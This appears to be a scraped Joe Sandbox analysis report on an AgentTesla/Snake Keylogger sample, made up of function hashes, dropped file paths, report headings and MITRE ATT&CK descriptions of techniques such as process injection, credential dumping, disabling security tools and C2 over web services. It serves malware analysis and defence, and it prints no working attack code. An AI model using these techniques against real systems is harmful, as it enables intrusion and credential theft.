Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 891f19c176d6f38d036ddb8d88377a9d52ccff276acc4695086ecfc939727c24
Instruction ID: 620aa1c4bd007d7552b70373edcc45be3abcc30e48ced65edfa39a8acfa20674
Opcode Fuzzy Hash: 891f19c176d6f38d036ddb8d88377a9d52ccff276acc4695086ecfc939727c24
Instruction Fuzzy Hash: FF01DB353051056FDB141BA95C9097FBBDBEBCC360B05442DF949C7351DE61CC029750

Function 00F92803 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d2918a0bc73e639d86f87f226689d6f6666470fa69e1a683526626d1068102
Instruction ID: 6351387d05e854583ee0e89c2e9cc14036b852085aa3dcdd5c7c41c025032806
Opcode Fuzzy Hash: f1d2918a0bc73e639d86f87f226689d6f6666470fa69e1a683526626d1068102
Instruction Fuzzy Hash: B5119FB5D0460E8FCB40EFA9D9845EEBBF5BB49300F10526AD915B2220EB305A85DFA1

Function 00F9ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56f78f04697ded0d7ecabece7ed48dbc135fc2e00ff54e0bec41c13b9e93b4c
Instruction ID: ad3c0544443c457726af66885fb586b477f4647104fc7f01bea20f01614ebd21
Opcode Fuzzy Hash: a56f78f04697ded0d7ecabece7ed48dbc135fc2e00ff54e0bec41c13b9e93b4c
Instruction Fuzzy Hash: 4BF0F631B006144BAB156E3ED854A2AB6DEEFC8B75355407AE905CB361EE61CC0297C1

Function 00F9E8FB Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c36dfcca5095e8987ec18f772cf9c627b1b8e283e75a9facfe93f85858d36d
Instruction ID: c61bac7cae6e526748ca26a09930744d613201db9b84054f26073b91a83c0144
Opcode Fuzzy Hash: c8c36dfcca5095e8987ec18f772cf9c627b1b8e283e75a9facfe93f85858d36d
Instruction Fuzzy Hash: AC0128B9D0020ADFDF40DFA4D844AAEBBB1FB49300F008566D910B3354D774AA55CF90

Function 00F9F5C0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33343c6706cec2688edeb94ba6d4cb442a0963f3dedcb90232b3287a48124fa5
Instruction ID: 67259371c04bd6cd48837e428b334735e16537ac68dbf4e6d811c406d435ba91
Opcode Fuzzy Hash: 33343c6706cec2688edeb94ba6d4cb442a0963f3dedcb90232b3287a48124fa5
Instruction Fuzzy Hash: CEF012B1A11225CF8B84EF7CC404AAA7BF0AF48220B2144B9D50ADB320EA30DD048BD0

Function 00F99C2C Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa2a02e5b8c6d387fe0631814b6da59be746ec47fee59153429ffbf8bf267e7
Instruction ID: 32d1de455c65663e344c17bf1ac515b2a48be320ba6a3f0474e70a7239e396e2
Opcode Fuzzy Hash: daa2a02e5b8c6d387fe0631814b6da59be746ec47fee59153429ffbf8bf267e7
Instruction Fuzzy Hash: F9F08C32E041189FDF00CF699C48AEEBBE5EBC8331F15C22AE928C3264D3714A159B90

Function 00F928A2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72e11e0a8ab25ecfc0e6cbb8cbbf9e041f7209cafa359b57cacaf9df4899a5b1
Instruction ID: 2ce8031bbede5f3b03c1c2315d7f785d55a0758f9a0a36d970faa87cdef087c4
Opcode Fuzzy Hash: 72e11e0a8ab25ecfc0e6cbb8cbbf9e041f7209cafa359b57cacaf9df4899a5b1
Instruction Fuzzy Hash: D8E02031D553978BC702EBB09C100EEBB345DC2111B498557C0A177091EF34160DC761

Function 00F96739 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2b1d31ae82373eb03bd3a906fac75f55e9c15086e74ad9b34456aa46fef0783
Instruction ID: 841e0c577356efaff5d33d1122d46cbfacdf0cc640902d43b942e972e6ab78c9
Opcode Fuzzy Hash: d2b1d31ae82373eb03bd3a906fac75f55e9c15086e74ad9b34456aa46fef0783
Instruction Fuzzy Hash: 8BE0C23412E3D68FC703B334DCA54453F35DD82100708C7EAD0858E5ABCAB4884A8B12

Function 00F928B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
Instruction ID: 147ee78828227962921ec1eba055844c63657c25adc41008e53666b5b6430e1e
Opcode Fuzzy Hash: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
Instruction Fuzzy Hash: C1D01732E2126B968B00AAA5EC048EEB738EE96661B948626D52437140EB70665986A1

Function 00F98EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 9a7c0a4c1d4f0167b7322c22575879a2f2991072bb50d3eca5e2b449b0bb5b53
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: B1C08C3360C1282ABA34104F7C40EB3BB8DC3C23F8A211137FA2CD3200AC429C8221F8

Function 00F9D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dbb137fc2062240dac95935d0efcfbd8c133369be68770536d4e469f31860f0
Instruction ID: b36c485334cd8fd496a0e605d2c59e5ae94556e4712b586f12d620c18c4d2b4f
Opcode Fuzzy Hash: 2dbb137fc2062240dac95935d0efcfbd8c133369be68770536d4e469f31860f0
Instruction Fuzzy Hash: 45D06735E0410DCBCF20DFA9E8844DCFB71EF89321F20912AD925A3251D6305455DF11

Function 00F9AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e132e54a28938980f8497c7ac0a25fb8f598e0e27b05d7407490033892bb2ee
Instruction ID: 0fbc18f1eb7563eaa11dc3801a4cb24f02587c3daae1b7105cc9bafb60a2e5c9
Opcode Fuzzy Hash: 2e132e54a28938980f8497c7ac0a25fb8f598e0e27b05d7407490033892bb2ee
Instruction Fuzzy Hash: 84D0673AB00008DFCB049F99EC809DDF776FB9C221B448116F925A3260C6719925DB60

Function 00F96748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b04f5a16abf6a6782847fb433fdc16cd066fb4d4364155754cdf6dab368d2de
Instruction ID: de18ac7ba26d82b82bd47776f1f3b9b583256a13aa3e70dd5daf9c254cdea918
Opcode Fuzzy Hash: 8b04f5a16abf6a6782847fb433fdc16cd066fb4d4364155754cdf6dab368d2de
Instruction Fuzzy Hash: C7C0123051130A8ED501F775EC85656775EA6C06007409614A1095E65DDEB45D964B90

Function 00F998F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4589201870.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_f90000_xRAvleeiuDbJ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d271a7c72605260a429d29b852114cfe154c7575722550eecd5f83a066e63352
Instruction ID: 59c5396f5e94a83dfdea1af837499fd57ac54333d418c9e352c4fda99e419a05
Opcode Fuzzy Hash: d271a7c72605260a429d29b852114cfe154c7575722550eecd5f83a066e63352
Instruction Fuzzy Hash: C5C04C1555E3D28FCB1787B05EA9245BF34AE4711171983FBC084CA4B3C018045AD753

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xRAvleeiuDbJ.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_321b0kgr.jip.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mjz2djq.ijo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpdhrbur.m1r.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_deft0jmd.vz2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fawfcoug.1hk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mlghwjt0.ldc.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvokjb13.ohv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruztdt04.kyl.ps1

Windows Analysis Report
SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre